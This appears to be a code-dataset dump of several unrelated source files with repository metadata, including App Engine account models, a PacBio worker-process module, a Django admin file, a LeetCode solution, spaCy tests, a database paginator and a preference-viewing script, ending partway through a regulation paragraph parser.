"""A specific Subversion repository."""
name = db.StringProperty(required=True)
url = db.LinkProperty(required=True)
owner = db.UserProperty(auto_current_user_add=True)
guid = db.StringProperty() # global unique repository id
def __str__(self):
return self.name
class Branch(db.Model):
"""A trunk, branch, or a tag in a specific Subversion repository."""
repo = db.ReferenceProperty(Repository, required=True)
# Cache repo.name as repo_name, to speed up set_branch_choices()
# in views.IssueBaseForm.
repo_name = db.StringProperty()
category = db.StringProperty(required=True,
choices=('*trunk*', 'branch', 'tag'))
name = db.StringProperty(required=True)
url = db.LinkProperty(required=True)
owner = db.UserProperty(auto_current_user_add=True)
# Accounts ###
class Account(db.Model):
"""Maps a user or email address to a user-selected nickname, and more.
Nicknames do not have to be unique.
The default nickname is generated from the email address by
stripping the first '@' sign and everything after it. The email
should not be empty nor should it start with '@' (AssertionError
error is raised if either of these happens).
This also holds a list of ids of starred issues. The expectation
that you won't have more than a dozen or so starred issues (a few
hundred in extreme cases) and the memory used up by a list of
integers of that size is very modest, so this is an efficient
solution. (If someone found a use case for having thousands of
starred issues we'd have to think of a different approach.)
"""
user = db.UserProperty(auto_current_user_add=True, required=True)
email = db.EmailProperty(required=True) # key == <email>
nickname = db.StringProperty(required=True)
default_context = db.IntegerProperty(default=engine.DEFAULT_CONTEXT,
choices=CONTEXT_CHOICES)
default_column_width = db.IntegerProperty(
default=engine.DEFAULT_COLUMN_WIDTH)
created = db.DateTimeProperty(auto_now_add=True)
modified = db.DateTimeProperty(auto_now=True)
stars = db.ListProperty(int) # Issue ids of all starred issues
fresh = db.BooleanProperty()
uploadpy_hint = db.BooleanProperty(default=True)
notify_by_email = db.BooleanProperty(default=True)
notify_by_chat = db.BooleanProperty(default=False)
use_code_highlight = db.BooleanProperty(default=False)
# Current user's Account. Updated by
# middleware.AddUserToRequestMiddleware.
current_user_account = None
lower_email = db.StringProperty()
lower_nickname = db.StringProperty()
xsrf_secret = db.TextProperty() # blob
fogbugz_token = db.StringProperty()
"""Fogbuzg authorization toke."""
# Note that this doesn't get called when doing multi-entity puts.
def put(self):
self.lower_email = str(self.email).lower()
self.lower_nickname = self.nickname.lower()
super(Account, self).put()
@classmethod
def get_account_for_user(cls, user):
"""Get the Account for a user, creating a default one if needed."""
email = user.email()
assert email
key = '<%s>' % email
# Since usually the account already exists, first try getting it
# without the transaction implied by get_or_insert().
account = cls.get_by_key_name(key)
if account is not None:
return account
nickname = cls.create_nickname_for_user(user)
return cls.get_or_insert(
key, user=user, email=email, nickname=nickname,
fresh=True)
@classmethod
def create_nickname_for_user(cls, user):
"""Returns a unique nickname for a user."""
name = nickname = user.email().split('@', 1)[0]
next_char = chr(ord(nickname[0].lower()) + 1)
existing_nicks = [account.lower_nickname
for account in cls.gql(('WHERE lower_nickname >= :1 AND '
'lower_nickname < :2'),
nickname.lower(), next_char)]
suffix = 0
while nickname.lower() in existing_nicks:
suffix += 1
nickname = '%s%d' % (name, suffix)
return nickname
@classmethod
def get_nickname_for_user(cls, user):
"""Get the nickname for a user."""
return cls.get_account_for_user(user).nickname
@classmethod
def get_account_for_email(cls, email):
"""Get the Account for an email address, or return None."""
assert email
key = '<%s>' % email
return cls.get_by_key_name(key)
@classmethod
def get_accounts_for_emails(cls, emails):
"""Get the Accounts for each of a list of email addresses."""
return cls.get_by_key_name(['<%s>' % email for email in emails])
@classmethod
def get_by_key_name(cls, key, **kwds):
"""Override db.Model.get_by_key_name() to use cached value if possible."""
if not kwds and cls.current_user_account is not None:
if key == cls.current_user_account.key().name():
return cls.current_user_account
return super(Account, cls).get_by_key_name(key, **kwds)
@classmethod
def get_multiple_accounts_by_email(cls, emails):
"""Get multiple accounts. Returns a dict by email."""
results = {}
keys = []
for email in emails:
if cls.current_user_account and email == cls.current_user_account.email:
results[email] = cls.current_user_account
else:
keys.append('<%s>' % email)
if keys:
accounts = cls.get_by_key_name(keys)
for account in accounts:
if account is not None:
results[account.email] = account
return results
@classmethod
def get_nickname_for_email(cls, email, default=None):
"""Get the nickname for an email address, possibly a default.
If default is None a generic nickname is computed from the email
address.
Args:
email: email address.
default: If given and no account is found, returned as the default value.
Returns:
Nickname for given email.
"""
account = cls.get_account_for_email(email)
if account is not None and account.nickname:
return account.nickname
if default is not None:
return default
return email.replace('@', '_')
@classmethod
def get_account_for_nickname(cls, nickname):
"""Get the list of Accounts that have this nickname."""
assert nickname
assert '@' not in nickname
return cls.all().filter('lower_nickname =', nickname.lower()).get()
@classmethod
def get_email_for_nickname(cls, nickname):
"""Turn a nickname into an email address.
If the nickname is not unique or does not exist, this returns None.
"""
account = cls.get_account_for_nickname(nickname)
if account is None:
return None
return account.email
def user_has_selected_nickname(self):
"""Return True if the user picked the nickname.
Normally this returns 'not self.fresh', but if that property is
None, we assume that if the created and modified timestamp are
within 2 seconds, the account is fresh (i.e. the user hasn't
selected a nickname yet). We then also update self.fresh, so it
is used as a cache and may even be written back if we're lucky.
"""
if self.fresh is None:
delta = self.created - self.modified
# Simulate delta = abs(delta)
if delta.days < 0:
delta = -delta
self.fresh = (delta.days == 0 and delta.seconds < 2)
return not self.fresh
_drafts = None
@property
def drafts(self):
"""A list of issue ids that have drafts by this user.
This is cached in memcache.
"""
if self._drafts is None:
if self._initialize_drafts():
self._save_drafts()
return self._drafts
def update_drafts(self, issue, have_drafts=None):
"""Update the user's draft status for this issue.
Args:
issue: an Issue instance.
have_drafts: optional bool forcing the draft status. By default,
issue.num_drafts is inspected (which may query the datastore).
The Account is written to the datastore if necessary.
"""
dirty = False
if self._drafts is None:
dirty = self._initialize_drafts()
id = issue.key().id()
if have_drafts is None:
# Beware, this may do a query.
have_drafts = bool(issue.num_drafts)
if have_drafts:
if id not in self._drafts:
self._drafts.append(id)
dirty = True
else:
if id in self._drafts:
self._drafts.remove(id)
dirty = True
if dirty:
self._save_drafts()
def _initialize_drafts(self):
"""Initialize self._drafts from scratch.
This mostly exists as a schema conversion utility.
Returns:
True if the user should call self._save_drafts(), False if not.
"""
drafts = memcache.get('user_drafts:' + self.email)
if drafts is not None:
self._drafts = drafts
# logging.info('HIT: %s -> %s', self.email, self._drafts)
return False
# We're looking for the Issue key id. The ancestry of comments goes:
# Issue -> PatchSet -> Patch -> Comment.
issue_ids = set(comment.key().parent().parent().parent().id()
for comment in gql(Comment,
'WHERE author = :1 AND draft = TRUE',
self.user))
self._drafts = list(issue_ids)
# logging.info('INITIALIZED: %s -> %s', self.email, self._drafts)
return True
def _save_drafts(self):
"""Save self._drafts to memcache."""
# logging.info('SAVING: %s -> %s', self.email, self._drafts)
memcache.set('user_drafts:' + self.email, self._drafts, 3600)
def get_xsrf_token(self, offset=0):
"""Return an XSRF token for the current user."""
# This code assumes that
# self.user.email() == users.get_current_user().email()
current_user = users.get_current_user()
if self.user.id != current_user.id:
# Mainly for Google Account plus conversion.
logging.info('Updating user_id for %s from %s to %s' % (
self.user.email(), self.user.id, current_user.id))
self.user = current_user
self.put()
if not self.xsrf_secret:
xsrf_secret = os.urandom(8)
self.xsrf_secret = xsrf_secret
self.put()
m = md5(
force_unicode(self.xsrf_secret).encode('utf-8') if isinstance(self.xsrf_secret, unicode)
else self.xsrf_secret)
email_str = self.lower_email
if isinstance(email_str, unicode):
email_str = email_str.encode('utf-8')
m.update(self.lower_email)
when = int(time.time()) // 3600 + offset
m.update(str(when))
return m.hexdigest()
| [
"[email protected]"
] | |
8589d9bd7373b78746960b04f357c76a95469f96 | 3e24611b7315b5ad588b2128570f1341b9c968e8 | /pacbiolib/pacbio/pythonpkgs/kineticsTools/lib/python2.7/site-packages/kineticsTools/WorkerProcess.py | 8f942b04b941bca938157f82b6d7dc6e0aca26f1 | [
"BSD-2-Clause"
] | permissive | bioCKO/lpp_Script | dc327be88c7d12243e25557f7da68d963917aa90 | 0cb2eedb48d4afa25abc2ed7231eb1fdd9baecc2 | refs/heads/master | 2022-02-27T12:35:05.979231 | 2019-08-27T05:56:33 | 2019-08-27T05:56:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,249 | py | #################################################################################
# Copyright (c) 2011-2013, Pacific Biosciences of California, Inc.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Pacific Biosciences nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY
# THIS LICENSE. THIS SOFTWARE IS PROVIDED BY PACIFIC BIOSCIENCES AND ITS
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL PACIFIC BIOSCIENCES OR
# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#################################################################################
import cProfile
import logging
import os.path
import copy
from multiprocessing import Process
from multiprocessing.process import current_process
from threading import Thread, Event
from urlparse import urlparse
import warnings
import numpy as np
import pbcore.io
from pbcore.io.opener import (openAlignmentFile, openIndexedAlignmentFile)
# FIXME this should ultimately go somewhere else. actually, so should the
# rest of this module.
def _openFiles(self, refFile=None, sharedIndices=None):
"""
Hack to enable sharing of indices (but not filehandles!) between dataset
instances.
"""
log = logging.getLogger()
log.debug("Opening resources")
for k, extRes in enumerate(self.externalResources):
location = urlparse(extRes.resourceId).path
sharedIndex = None
if sharedIndices is not None:
sharedIndex = sharedIndices[k]
try:
resource = openIndexedAlignmentFile(
location,
referenceFastaFname=refFile,
sharedIndex=sharedIndex)
except (IOError, ValueError):
log.info("pbi file missing for {f}, operating with "
"reduced speed and functionality".format(
f=location))
resource = openAlignmentFile(location,
referenceFastaFname=refFile)
if not resource:
raise IOError("{f} fails to open".format(f=location))
self._openReaders.append(resource)
log.debug("Done opening resources")
def _reopen (self):
"""
Force re-opening of underlying alignment files, preserving the
reference and indices if present, and return a copy of the
AlignmentSet. This is a workaround to allow us to share the index
file(s) already loaded in memory while avoiding multiprocessing
problems related to .bam files.
"""
refFile = None
if not self.isCmpH5:
refFile = self._referenceFile
newSet = copy.deepcopy(self)
newSet._referenceFastaFname = refFile
if not self.isCmpH5 and not self.hasPbi:
self.close()
newSet._openFiles(refFile=refFile)
else:
indices = [ f.index for f in self.resourceReaders() ]
self.close()
_openFiles(newSet, refFile=refFile, sharedIndices=indices)
return newSet
class Worker(object):
"""
Base class for worker processes that read reference coordinates
from the task queue, perform variant calling, then push results
back to another queue, to be written to a GFF file by another
process.
All tasks that are O(genome length * coverage depth) should be
distributed to Worker processes, leaving the ResultCollector
process only O(genome length) work to do.
"""
def __init__(self, options, workQueue, resultsQueue,
sharedAlignmentSet=None):
self.options = options
self.daemon = True
self._workQueue = workQueue
self._resultsQueue = resultsQueue
self._sharedAlignmentSet = sharedAlignmentSet
def _run(self):
logging.info("Worker %s (PID=%d) started running" % (self.name, self.pid))
if self._sharedAlignmentSet is not None:
# XXX this will create an entirely new AlignmentSet object, but
# keeping any indices already loaded into memory
self.caseCmpH5 = _reopen(self._sharedAlignmentSet)
#`self._sharedAlignmentSet.close()
self._sharedAlignmentSet = None
else:
warnings.warn("Shared AlignmentSet not used")
self.caseCmpH5 = pbcore.io.AlignmentSet(self.options.infile,
referenceFastaFname=self.options.reference)
self.controlCmpH5 = None
if not self.options.control is None:
# We have a cmp.h5 with control vales -- load that cmp.h5
self.controlCmpH5 = pbcore.io.AlignmentSet(self.options.control,
referenceFastaFname=self.options.reference)
if self.options.randomSeed is None:
np.random.seed(42)
self.onStart()
while True:
if self.isTerminated():
break
chunkDesc = self._workQueue.get()
if chunkDesc is None:
# Sentinel indicating end of input. Place a sentinel
# on the results queue and end this worker process.
self._resultsQueue.put(None)
self._workQueue.task_done()
break
else:
(chunkId, datum) = chunkDesc
logging.info("Got chunk: (%s, %s) -- Process: %s" % (chunkId, str(datum), current_process()))
result = self.onChunk(datum)
logging.debug("Process %s: putting result." % current_process())
self._resultsQueue.put((chunkId, result))
self._workQueue.task_done()
self.onFinish()
logging.info("Process %s (PID=%d) done; exiting." % (self.name, self.pid))
def run(self):
# Make the workers run with lower priority -- hopefully the results writer will win
# It is single threaded so it could become the bottleneck
self._lowPriority()
if self.options.doProfiling:
cProfile.runctx("self._run()",
globals=globals(),
locals=locals(),
filename="profile-%s.out" % self.name)
else:
self._run()
#==
# Begin overridable interface
#==
def onStart(self):
pass
def onChunk(self, target):
"""
This function is the heart of the matter.
referenceWindow, alnHits -> result
"""
pass
def onFinish(self):
pass
class WorkerProcess(Worker, Process):
"""Worker that executes as a process."""
def __init__(self, *args, **kwds):
Process.__init__(self)
super(WorkerProcess, self).__init__(*args, **kwds)
self.daemon = True
def _lowPriority(self):
"""
Set the priority of the process to below-normal.
"""
import sys
try:
sys.getwindowsversion()
except:
isWindows = False
else:
isWindows = True
if isWindows:
# Based on:
# "Recipe 496767: Set Process Priority In Windows" on ActiveState
# http://code.activestate.com/recipes/496767/
import win32api
import win32process
import win32con
pid = win32api.GetCurrentProcessId()
handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, pid)
win32process.SetPriorityClass(handle, win32process.BELOW_NORMAL_PRIORITY_CLASS)
else:
os.nice(10)
def isTerminated(self):
return False
class WorkerThread(Worker, Thread):
"""Worker that executes as a thread (for debugging purposes only)."""
def __init__(self, *args, **kwds):
Thread.__init__(self)
super(WorkerThread, self).__init__(*args, **kwds)
self._stop = Event()
self.daemon = True
self.exitcode = 0
def terminate(self):
self._stop.set()
def isTerminated(self):
return self._stop.isSet()
@property
def pid(self):
return -1
def _lowPriority(self):
pass
| [
"[email protected]"
] | |
881b2796e754eccb435d9f1824561012eb3f9263 | 8308fa0e5f998e0aa6741af5720d6da99497060d | /estoque/admin.py | deb9bd5b8513f6c1109d2812a086ec45998d55fe | [] | no_license | gbpjr/sistema-estoque | 7aae11c657c555b98a329cdafde704504ef8b23a | 701471e593fa758a1da1b66fa279da4dd3d979e7 | refs/heads/master | 2020-04-23T08:37:35.123431 | 2019-02-24T21:43:14 | 2019-02-24T21:43:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | from django.contrib import admin
from .models import Local, Tipo, Fabricante, Componente
admin.site.register(Local)
admin.site.register(Tipo)
admin.site.register(Fabricante)
admin.site.register(Componente)
| [
"="
] | = |
eadbd701bc7fafb29b726f2330b241a74aad34d8 | 9cdfe7992090fb91696eec8d0a8ae15ee12efffe | /recursion/prob1221.py | 75de61d8cb82f1561f811ecae781765b333d2848 | [] | no_license | binchen15/leet-python | e62aab19f0c48fd2f20858a6a0d0508706ae21cc | e00cf94c5b86c8cca27e3bee69ad21e727b7679b | refs/heads/master | 2022-09-01T06:56:38.471879 | 2022-08-28T05:15:42 | 2022-08-28T05:15:42 | 243,564,799 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # 1221 Split string into Balanced Strings
class Solution(object):
def balancedStringSplit(self, s):
"""
:type s: str
:rtype: int
"""
m = len(s)
if m == 2:
return 1
i = 2
while i < m:
if self.isBalanced(s[:i]):
# self.balancedStringSplit(s[:i])
return 1 + self.balancedStringSplit(s[i:])
i += 2
return 1
def isBalanced(self, sub):
return sub.count("L") == sub.count('R')
| [
"[email protected]"
] | |
31b90af5e2d762ee6482a7c0202484d4b2a0cff5 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/spaCy/2016/4/test_only_punct.py | 12c9580880eb988530171fcf1973e0dc5ca361fa | [
"MIT"
] | permissive | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 191 | py | from __future__ import unicode_literals
def test_only_pre1(en_tokenizer):
assert len(en_tokenizer("(")) == 1
def test_only_pre2(en_tokenizer):
assert len(en_tokenizer("((")) == 2
| [
"[email protected]"
] | |
0e9096e4b0553691cf5b1f21edf9dbdd5345cd3b | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/database/paging/paginator.py | 080a42e2616f9e7b4b8a7043c65bb37c92b2c6a9 | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 14,011 | py | # -*- coding: utf-8 -*-
"""
database paging paginator module.
"""
from copy import deepcopy
from abc import abstractmethod
from collections import OrderedDict
from flask import url_for
import pyrin.configuration.services as config_services
import pyrin.database.paging.services as paging_services
import pyrin.security.session.services as session_services
from pyrin.core.structs import CoreObject
from pyrin.core.exceptions import CoreNotImplementedError
from pyrin.database.orm.sql.schema.globals import BIG_INTEGER_MAX
from pyrin.database.paging.exceptions import PageSizeLimitError, TotalCountIsAlreadySetError
class PaginatorBase(CoreObject):
"""
paginator base class.
"""
@abstractmethod
def next(self):
"""
gets the next page number.
returns None if there is no next page.
:raises CoreNotImplementedError: core not implemented error.
:rtype: int
"""
raise CoreNotImplementedError()
@abstractmethod
def previous(self):
"""
gets the previous page number.
returns None if there is no previous page.
:raises CoreNotImplementedError: core not implemented error.
:rtype: int
"""
raise CoreNotImplementedError()
@abstractmethod
def inject_paging_keys(self, values, **options):
"""
injects paging keys into given values from given inputs.
:param dict values: dict values to inject paging keys into it.
:raises CoreNotImplementedError: core not implemented error.
"""
raise CoreNotImplementedError()
@abstractmethod
def paginate(self, items, **options):
"""
paginates the given items.
it returns a tuple of two values, first value is a list of items
to be returned to client, and second value is a dict of metadata
to be injected into client response.
:param list items: items to be paginated.
:raises CoreNotImplementedError: core not implemented error.
:returns: tuple[list items, dict metadata]
:rtype: tuple[list, dict]
"""
raise CoreNotImplementedError()
@abstractmethod
def has_next(self, count, *args, **options):
"""
gets a value indicating that there is a next page available.
it returns a tuple of two items. first item is a boolean indicating
that there is a next page and the second item is the number of excess
items that must be removed from end of items.
:param int count: count of current items.
:raises CoreNotImplementedError: core not implemented error.
:returns: tuple[bool has_next, int excess]
:rtype: tuple[bool, int]
"""
raise CoreNotImplementedError()
@abstractmethod
def has_previous(self, count, *args, **options):
"""
gets a value indicating that there is a previous page available.
it returns a tuple of two items. first item is a boolean indicating
that there is a previous page and the second item is the number of
excess items that must be removed from beginning of items.
:param int count: count of current items.
:raises CoreNotImplementedError: core not implemented error.
:returns: tuple[bool has_previous, int excess]
:rtype: tuple[bool, int]
"""
raise CoreNotImplementedError()
def copy(self):
"""
returns a deep copy of this instance
:rtype: PaginatorBase
"""
return deepcopy(self)
@property
@abstractmethod
def current_page(self):
"""
gets current page number.
:raises CoreNotImplementedError: core not implemented error.
:rtype: int
"""
raise CoreNotImplementedError()
@property
@abstractmethod
def current_page_size(self):
"""
gets current page size.
:raises CoreNotImplementedError: core not implemented error.
:rtype: int
"""
raise CoreNotImplementedError()
@property
@abstractmethod
def total_count(self):
"""
gets the total count of items in all pages.
:raises CoreNotImplementedError: core not implemented error.
:rtype: int
"""
raise CoreNotImplementedError()
@total_count.setter
@abstractmethod
def total_count(self, value):
"""
sets the total count of items in all pages.
:param int value: total count to be set.
:raises CoreNotImplementedError: core not implemented error.
"""
raise CoreNotImplementedError()
class SimplePaginator(PaginatorBase):
"""
simple paginator class.
page numbers start from 1.
it does not emit any extra queries to database to fetch count or like that.
the only limitation is that it could not detect previous page in `last_page + 1` page.
"""
def __init__(self, endpoint, **options):
"""
initializes an instance of SimplePaginator.
:param str endpoint: endpoint of route.
:keyword int page_size: default page size.
if not provided, it will be get from
`default_page_size` of `database` config store.
:keyword int max_page_size: max allowed page size.
if not provided, it will be get from
`max_page_size` of `database` config store.
:raises PageSizeLimitError: page size limit error.
"""
super().__init__()
global_max_page_size = config_services.get('database', 'paging', 'max_page_size')
max_page_size = options.get('max_page_size')
if max_page_size is None or max_page_size < 1:
max_page_size = global_max_page_size
if max_page_size > global_max_page_size:
raise PageSizeLimitError('Max page size [{max}] is bigger than global max page '
'size which is [{global_max}] on endpoint [{endpoint}].'
.format(max=max_page_size,
global_max=global_max_page_size,
endpoint=endpoint))
page_size = options.get('page_size')
default_page_size = config_services.get('database', 'paging', 'default_page_size')
if page_size is None or page_size < 1:
page_size = min(default_page_size, max_page_size)
if page_size > max_page_size:
raise PageSizeLimitError('Page size [{page_size}] is bigger than max page size '
'which is [{max}] on endpoint [{endpoint}].'
.format(page_size=page_size,
max=max_page_size,
endpoint=endpoint))
self._page_size = page_size
self._max_page_size = max_page_size
self._endpoint = endpoint
self._limit = None
self._offset = None
self._current_page = None
self._current_page_size = None
self._has_next = False
self._has_previous = False
self._total_count = None
def _url_for(self, page, page_size):
"""
gets the url for given page number.
:param int page: page number to generate its url.
:param int page_size: page size.
:rtype: str
"""
request = session_services.get_current_request()
options = OrderedDict()
options.update(request.get_all_query_strings())
options.update(paging_services.generate_paging_params(page, page_size))
options.update(request.view_args or {})
options.update(_method=request.method)
return url_for(self._endpoint, **options)
def has_next(self, count, **options):
"""
gets a value indicating that there is a next page available.
it returns a tuple of two items. first item is a boolean indicating
that there is a next page and the second item is the number of excess
items that must be removed from end of items.
:param int count: count of current items.
:returns: tuple[bool has_next, int excess]
:rtype: tuple[bool, int]
"""
# the original limit is always 2 less than the current limit.
excess = count - (self._limit - 2)
if excess <= 0:
self._has_next = False
return self._has_next, 0
if self._current_page == 1:
self._has_next = excess > 0
return self._has_next, excess
else:
self._has_next = excess > 1
return self._has_next, excess - 1
def has_previous(self, count, **options):
"""
gets a value indicating that there is a previous page available.
it returns a tuple of two items. first item is a boolean indicating
that there is a previous page and the second item is the number of
excess items that must be removed from beginning of items.
:param int count: count of current items.
:returns: tuple[bool has_previous, int excess]
:rtype: tuple[bool, int]
"""
# at any page, if there is a count > 0, it means that there is a previous
# page available. because the first item is from the previous page.
if count <= 0 or self._current_page == 1:
self._has_previous = False
return self._has_previous, 0
self._has_previous = True
return self._has_previous, 1
def next(self):
"""
gets the next page number.
returns None if there is no next page.
:rtype: int
"""
if self._has_next is True:
return self._url_for(self._current_page + 1, self._current_page_size)
return None
def previous(self):
"""
gets the previous page number.
returns None if there is no previous page.
:rtype: int
"""
if self._has_previous is True:
return self._url_for(self._current_page - 1, self._current_page_size)
return None
def inject_paging_keys(self, values, **options):
"""
injects paging keys into given values from given inputs.
:param dict values: dict values to inject paging keys into it.
:keyword int page: page number.
:keyword int page_size: page size.
"""
page, page_size = paging_services.get_paging_params(**options)
if page is None or not isinstance(page, int) or page < 1:
page = 1
if page > BIG_INTEGER_MAX:
page = BIG_INTEGER_MAX
if page_size is None or not isinstance(page_size, int) or page_size < 1:
page_size = self._page_size
elif page_size > self._max_page_size:
page_size = self._max_page_size
# we increase limit by 2 to be able to detect if there is a next and previous page.
# the extra items will not be returned to client.
self._limit = page_size + 2
offset = page - 1
extra_offset = offset * page_size
if extra_offset > BIG_INTEGER_MAX:
extra_offset = BIG_INTEGER_MAX
if extra_offset > 0:
# we decrease offset by 1 to be able to detect if there is a previous page.
# the extra item will not be returned to client.
extra_offset = extra_offset - 1
self._offset = extra_offset
self._current_page = page
self._current_page_size = page_size
paging_services.inject_paging_keys(self._limit, self._offset, values)
def paginate(self, items, **options):
"""
paginates the given items.
it returns a tuple of two values, first value is a list of items
to be returned to client, and second value is a dict of metadata
to be injected into client response.
:param list items: items to be paginated.
:returns: tuple[list items, dict metadata]
:rtype: tuple[list, dict]
"""
metadata = OrderedDict()
count = len(items)
result = items
has_next, excess_end = self.has_next(count)
has_previous, excess_first = self.has_previous(count)
if has_next is True:
result = result[:-excess_end]
count = count - excess_end
if has_previous is True:
result = result[excess_first:]
count = count - excess_first
next_url = self.next()
previous_url = self.previous()
if self.total_count is not None:
metadata.update(count_total=self.total_count)
metadata.update(count=count, next=next_url, previous=previous_url)
return result, metadata
@property
def current_page(self):
"""
gets current page number.
:rtype: int
"""
return self._current_page
@property
def current_page_size(self):
"""
gets current page size.
:rtype: int
"""
return self._current_page_size
@property
def total_count(self):
"""
gets the total count of items in all pages.
:rtype: int
"""
return self._total_count
@total_count.setter
def total_count(self, value):
"""
sets the total count of items in all pages.
:param int value: total count to be set.
:raises TotalCountIsAlreadySetError: total count is already set error.
"""
if self._total_count is not None:
raise TotalCountIsAlreadySetError('Total count for paginator is already '
'set and could not be overwritten in '
'current request.')
self._total_count = value
| [
"[email protected]"
] | |
47c3be1644c3b304105e0c662dc9f38ee860d001 | 9ecb6a1d3a71e7f87f3784af6b808f23a2abe348 | /drlhp/show_prefs.py | 4227c4f161eda839c7a5c5661322f9b2b12658a5 | [] | no_license | HumanCompatibleAI/interactive-behaviour-design | 13ae305b39d29595e8fd5907f8d9e9fa6c2efc16 | 226db7a55d64ce15edfb8d7b3352c7bf7b81b533 | refs/heads/master | 2020-05-02T16:54:02.232639 | 2019-08-08T14:29:11 | 2019-08-08T14:29:11 | 178,082,205 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | #!/usr/bin/env python3
"""
Display examples of the specified preference database
(with the less-preferred segment on the left,
and the more-preferred segment on the right)
(skipping over equally-preferred segments)
"""
import argparse
import pickle
from multiprocessing import freeze_support
import numpy as np
from utils import VideoRenderer
def main():
parser = argparse.ArgumentParser()
parser.add_argument("prefs", help=".pkl.gz file")
args = parser.parse_args()
with open(args.prefs, 'rb') as pkl_file:
print("Loading preferences from '{}'...".format(args.prefs), end="")
prefs = pickle.load(pkl_file)
print("done!")
print("{} preferences found".format(len(prefs)))
print("(Preferred clip on the left)")
v = VideoRenderer(zoom=2, mode=VideoRenderer.restart_on_get_mode)
q = v.vid_queue
prefs = prefs[0] # The actual pickle file is a tuple of test, train DBs
for k1, k2, pref in prefs.prefs:
pref = tuple(pref)
if pref == (0.0, 1.0) or pref == (0.5, 0.5):
s1 = np.array(prefs.segments[k2])
s2 = np.array(prefs.segments[k1])
elif pref == (1.0, 0.0):
s1 = np.array(prefs.segments[k1])
s2 = np.array(prefs.segments[k2])
else:
raise Exception("Unexpected preference", pref)
print("Preference", pref)
vid = []
height = s1[0].shape[0]
border = np.ones((height, 10), dtype=np.uint8) * 128
for t in range(len(s1)):
# -1 => select the last frame in the 4-frame stack
f1 = s1[t, :, :, -1]
f2 = s2[t, :, :, -1]
frame = np.hstack((f1, border, f2))
vid.append(frame)
n_pause_frames = 10
for _ in range(n_pause_frames):
vid.append(np.copy(vid[-1]))
q.put(vid)
input()
v.stop()
if __name__ == '__main__':
freeze_support()
main()
| [
"[email protected]"
] | |
b5644533f4814bf76a438d3f873511d94ae32cb7 | ffedbe2d957677d65cb873d96482f1c94e74b988 | /regs/depth/paragraph.py | 4c7ad12fb53030d7ebe97823604eec9398cee496 | [] | no_license | cmc333333/Depth-Parser | b7602c158b6cb75179af90b78af93f28e547a3d2 | 4332b8c51e8e7d44b68985b3845b300d251af536 | refs/heads/master | 2020-05-20T12:09:03.662019 | 2013-04-16T20:37:56 | 2013-04-16T20:37:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,421 | py | import itertools
import re
from regs.depth import tree
from regs.search import segments
from regs.utils import roman_nums
import string
p_levels = [
list(string.ascii_lowercase),
[str(i) for i in range(1,51)],
list(itertools.islice(roman_nums(), 0, 50)),
list(string.ascii_uppercase),
# Technically, there's italics (alpha) and (roman), but we aren't
# handling that yet
]
class ParagraphParser():
def __init__(self, p_regex, inner_label_fn):
"""p_regex is the regular expression used when searching through
paragraphs. It should contain a %s for the next paragraph 'part'
(e.g. 'a', 'A', '1', 'i', etc.) inner_label_fn is a function which
takes the current label, and the next paragraph 'part' and produces
a new label."""
self.p_regex = p_regex
self.inner_label_fn = inner_label_fn
def matching_subparagraph_ids(self, p_level, paragraph):
"""Return a list of matches if this paragraph id matches one of the
subparagraph ids (e.g. letter (i) and roman numeral (i)."""
matches = []
for depth in range(p_level+1, len(p_levels)):
for sub_id, sub in enumerate(p_levels[depth]):
if sub == p_levels[p_level][paragraph]:
matches.append((depth, sub_id))
return matches
def best_start(self, text, p_level, paragraph, starts, exclude = []):
"""Given a list of potential paragraph starts, pick the best based
on knowledge of subparagraph structure. Do this by checking if the
id following the subparagraph (e.g. ii) is between the first match
and the second. If so, skip it, as that implies the first match was
a subparagraph."""
subparagraph_hazards = self.matching_subparagraph_ids(p_level,
paragraph)
starts = starts + [(len(text), len(text))]
for i in range(1, len(starts)):
_, prev_end = starts[i-1]
next_start, _ = starts[i]
s_text = text[prev_end:next_start]
s_exclude = [(e_start + prev_end, e_end + prev_end)
